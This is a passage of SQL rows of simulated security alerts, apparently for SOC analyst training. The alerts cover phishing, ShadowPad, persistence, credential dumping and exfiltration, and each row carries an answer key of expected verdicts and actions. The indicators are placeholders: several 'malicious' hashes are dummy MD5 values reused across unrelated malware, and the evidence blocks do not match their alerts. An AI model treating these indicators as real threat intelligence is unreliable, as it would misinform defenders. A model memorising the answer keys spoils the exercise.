(1241, 'Malware Execution on Compromised Systems', 'high', 'Endpoint Detection and Response (EDR) System', 'The Yahoyah malware was executed following a successful phishing attack, establishing a foothold on the victim system. This execution allows attackers to maintain control and initiate further espionage activities.', 'Malware Execution', 'T1059: Command and Scripting Interpreter', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"5678\",\"event_type\":\"malware_execution\",\"host_ip\":\"10.0.0.25\",\"host_name\":\"compromised-host\",\"username\":\"victim_user\",\"file_path\":\"C:\\\\Users\\\\victim_user\\\\AppData\\\\Roaming\\\\yahoyah.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"192.168.1.5\",\"external_ip\":\"203.0.113.10\",\"command_line\":\"C:\\\\Users\\\\victim_user\\\\AppData\\\\Roaming\\\\yahoyah.exe\",\"process_id\":1234,\"parent_process\":\"explorer.exe\"}', '2026-02-07 21:48:09', '2026-02-19 15:45:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches Yahoyah malware signature\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"yahoyah.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with spyware activities\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"victim_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account on the compromised 
host\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1242, 'Data Exfiltration Detected via Unusual Network Traffic', 'high', 'Network Traffic Analysis', 'In the final phase of the operation, unusual outbound network traffic was detected originating from an internal host (192.168.1.105) towards an external IP (203.0.113.55). The data packets identified were large and encrypted, suggesting potential exfiltration of sensitive data. The files transferred included classified documents under the guise of normal traffic. The external IP is associated with known APT group infrastructure.', 'Data Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.55\",\"protocol\":\"HTTPS\",\"file_hash\":\"bcf5a4e2b3b5c3c9d1f2f3a4b5c6d7e8\",\"filename\":\"classified_docs.zip\",\"user\":\"jdoe\",\"data_size\":\"350MB\",\"action\":\"ALLOW\",\"indicator\":\"High volume encrypted traffic to suspicious IP\"}', '2026-02-07 21:48:09', '2026-02-19 15:46:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal host suspected of data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"bcf5a4e2b3b5c3c9d1f2f3a4b5c6d7e8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with anomalous file transmissions.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"classified_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests 
sensitive content.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Corporate Directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1243, 'Initial Access via Phishing Email', 'medium', 'Email Gateway Logs', 'A spear-phishing email was detected attempting to compromise user credentials. The email contained a malicious attachment and was sent from a known malicious IP address linked to Earth Lusca. The operation is believed to be in its initial phase.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:22:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"sender_email\":\"attacker@example.com\",\"recipient_email\":\"victim@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"Invoice_2023.pdf\",\"attachment_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"user\":\"jdoe\",\"event_id\":\"EVT-89231\"}', '2026-02-07 21:48:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Database\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing attacks by Earth Lusca.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious PDF used in phishing.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Filename format used in previous phishing attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active 
Directory\",\"verdict\":\"internal\",\"details\":\"Company user potentially targeted.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-08T19:00:02.577Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1244, 'Execution of ShadowPad Backdoor', 'high', 'Endpoint Detection and Response (EDR) Systems', 'The ShadowPad backdoor was executed on a compromised host, establishing a command and control channel. This indicates a successful second stage of the attack following initial phishing tactics.', 'Malware Execution', 'T1219 - Remote Access Software', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.45\",\"username\":\"jdoe\",\"process_name\":\"svchost.exe\",\"process_command_line\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"malware_filename\":\"ShadowPad.dll\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.10\",\"destination_port\":443,\"network_protocol\":\"HTTPS\",\"suspicious_domain\":\"malicious-update.com\"}', '2026-02-07 21:48:51', '2026-02-19 04:03:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with ShadowPad.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the ShadowPad DLL file.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_reputation\",\"verdict\":\"malicious\",\"details\":\"Domain used for C2 communication by 
ShadowPad.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ShadowPad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Filename associated with ShadowPad malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1245, 'Persistence via Scheduled Task', 'medium', 'Windows Task Scheduler Logs', 'Earth Lusca has set up a scheduled task to maintain persistence by re-establishing the ShadowPad connection after system reboots.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"EventID\":\"4698\",\"EventType\":\"Information\",\"TimeCreated\":\"2023-10-01T14:32:00Z\",\"Computer\":\"victim-pc.local\",\"TaskName\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\ShadowPadReconnect\",\"TaskContent\":{\"Author\":\"SYSTEM\",\"TaskToRun\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\ProgramData\\\\ShadowPad\\\\spad.dll,Run\",\"RunAsUser\":\"NT AUTHORITY\\\\SYSTEM\",\"LogonType\":\"Password\",\"Trigger\":\"At system startup\",\"ExternalIP\":\"203.0.113.45\",\"InternalIP\":\"192.168.1.101\",\"MalwareHash\":\"c3fcd3d76192e4007dfb496cca67e13b\",\"CreatedByUser\":\"attacker@maliciousdomain.com\"}}', '2026-02-07 21:48:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with Earth Lusca command and control servers\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetworkScan\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"c3fcd3d76192e4007dfb496cca67e13b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of ShadowPad malware\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Email linked to Earth Lusca phishing 
campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.582Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":\\\"4698\\\",\\\"EventType\\\":\\\"Information\\\",\\\"TimeCreated\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"Computer\\\":\\\"victim-pc.local\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\ShadowPadReconnect\\\",\\\"TaskContent\\\":{\\\"Author\\\":\\\"SYSTEM\\\",\\\"TaskToRun\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\ProgramData\\\\\\\\ShadowPad\\\\\\\\spad.dll,Run\\\",\\\"RunAsUser\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"LogonType\\\":\\\"Password\\\",\\\"Trigger\\\":\\\"At system startup\\\",\\\"ExternalIP\\\":\\\"203.0.113.45\\\",\\\"InternalIP\\\":\\\"192.168.1.101\\\",\\\"MalwareHash\\\":\\\"c3fcd3d76192e4007dfb496cca67e13b\\\",\\\"CreatedByUser\\\":\\\"attacker@maliciousdomain.com\\\"}}\"},{\"timestamp\":\"2026-02-08T18:59:02.582Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":\\\"4698\\\",\\\"EventType\\\":\\\"Information\\\",\\\"TimeCreated\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"Computer\\\":\\\"victim-pc.local\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\ShadowPadReconnect\\\",\\\"TaskContent\\\":{\\\"Author\\\":\\\"SYSTEM\\\",\\\"TaskToRun\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\ProgramData\\\\\\\\ShadowPad\\\\\\\\spad.dll,Run\\\",\\\"RunAsUser\\\":\\\"NT 
AUTHORITY\\\\\\\\SYSTEM\\\",\\\"LogonType\\\":\\\"Password\\\",\\\"Trigger\\\":\\\"At system startup\\\",\\\"ExternalIP\\\":\\\"203.0.113.45\\\",\\\"InternalIP\\\":\\\"192.168.1.101\\\",\\\"MalwareHash\\\":\\\"c3fcd3d76192e4007dfb496cca67e13b\\\",\\\"CreatedByUser\\\":\\\"attacker@maliciousdomain.com\\\"}}\"},{\"timestamp\":\"2026-02-08T18:58:02.582Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":\\\"4698\\\",\\\"EventType\\\":\\\"Information\\\",\\\"TimeCreated\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"Computer\\\":\\\"victim-pc.local\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\ShadowPadReconnect\\\",\\\"TaskContent\\\":{\\\"Author\\\":\\\"SYSTEM\\\",\\\"TaskToRun\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\ProgramData\\\\\\\\ShadowPad\\\\\\\\spad.dll,Run\\\",\\\"RunAsUser\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"LogonType\\\":\\\"Password\\\",\\\"Trigger\\\":\\\"At system startup\\\",\\\"ExternalIP\\\":\\\"203.0.113.45\\\",\\\"InternalIP\\\":\\\"192.168.1.101\\\",\\\"MalwareHash\\\":\\\"c3fcd3d76192e4007dfb496cca67e13b\\\",\\\"CreatedByUser\\\":\\\"attacker@maliciousdomain.com\\\"}}\"},{\"timestamp\":\"2026-02-08T18:57:02.582Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":\\\"4698\\\",\\\"EventType\\\":\\\"Information\\\",\\\"TimeCreated\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"Computer\\\":\\\"victim-pc.local\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\ShadowPadReconnect\\\",\\\"TaskContent\\\":{\\\"Author\\\":\\\"SYSTEM\\\",\\\"TaskToRun\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\ProgramData\\\\\\\\ShadowPad\\\\\\\\spad.dll,Run\\\",\\\"RunAsUser\\\":\\\"NT 
AUTHORITY\\\\\\\\SYSTEM\\\",\\\"LogonType\\\":\\\"Password\\\",\\\"Trigger\\\":\\\"At system startup\\\",\\\"ExternalIP\\\":\\\"203.0.113.45\\\",\\\"InternalIP\\\":\\\"192.168.1.101\\\",\\\"MalwareHash\\\":\\\"c3fcd3d76192e4007dfb496cca67e13b\\\",\\\"CreatedByUser\\\":\\\"attacker@maliciousdomain.com\\\"}}\"},{\"timestamp\":\"2026-02-08T18:56:02.582Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":\\\"4698\\\",\\\"EventType\\\":\\\"Information\\\",\\\"TimeCreated\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"Computer\\\":\\\"victim-pc.local\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\ShadowPadReconnect\\\",\\\"TaskContent\\\":{\\\"Author\\\":\\\"SYSTEM\\\",\\\"TaskToRun\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\ProgramData\\\\\\\\ShadowPad\\\\\\\\spad.dll,Run\\\",\\\"RunAsUser\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"LogonType\\\":\\\"Password\\\",\\\"Trigger\\\":\\\"At system startup\\\",\\\"ExternalIP\\\":\\\"203.0.113.45\\\",\\\"InternalIP\\\":\\\"192.168.1.101\\\",\\\"MalwareHash\\\":\\\"c3fcd3d76192e4007dfb496cca67e13b\\\",\\\"CreatedByUser\\\":\\\"attacker@maliciousdomain.com\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1246, 'Lateral Movement with Cobalt Strike', 'high', 'Network Traffic Analysis', 'An unauthorized lateral movement attempt was detected within the network. The attackers employed Cobalt Strike to dump credentials and escalate privileges, aiming to expand access. This activity was identified through suspicious network traffic patterns.', 'Credential Dumping', 'T1003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:22:36Z\",\"source_ip\":\"185.199.108.153\",\"destination_ip\":\"192.168.1.45\",\"protocol\":\"TCP\",\"source_port\":443,\"destination_port\":5985,\"username\":\"jdoe\",\"process_name\":\"mimikatz.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_type\":\"CredentialDumping\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\"}', '2026-02-07 21:48:51', '2026-02-19 04:11:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known threat actor using Cobalt Strike.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal company asset.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with Mimikatz.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1247, 'Exfiltration of Sensitive Data', 'critical', 'Data Loss Prevention (DLP) Tools', 'In the final step of the operation, Earth Lusca exfiltrated sensitive governmental data to an external server. The data was transmitted via an unauthorized file transfer to a known malicious IP address.', 'Data Exfiltration', 'T1048 - Data Exfiltration Over Alternative Protocol', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-15T13:45:00Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.1.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"confidential_gov_data.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"dlp_policy\":\"Sensitive Data Exfiltration Policy\",\"action\":\"blocked\",\"alert_id\":\"ALERT-20231015-0001\"}', '2026-02-07 21:48:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous data exfiltration incidents.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_gov_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP Analysis\",\"verdict\":\"suspicious\",\"details\":\"File matches pattern of sensitive governmental data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"unknown\",\"details\":\"Newly observed hash not seen in previous databases.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
Directory\",\"verdict\":\"internal\",\"details\":\"Employee account involved in data transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.584Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"confidential_gov_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration Policy\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"ALERT-20231015-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.584Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"confidential_gov_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration Policy\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"ALERT-20231015-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.584Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"confidential_gov_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration Policy\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"ALERT-20231015-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.584Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 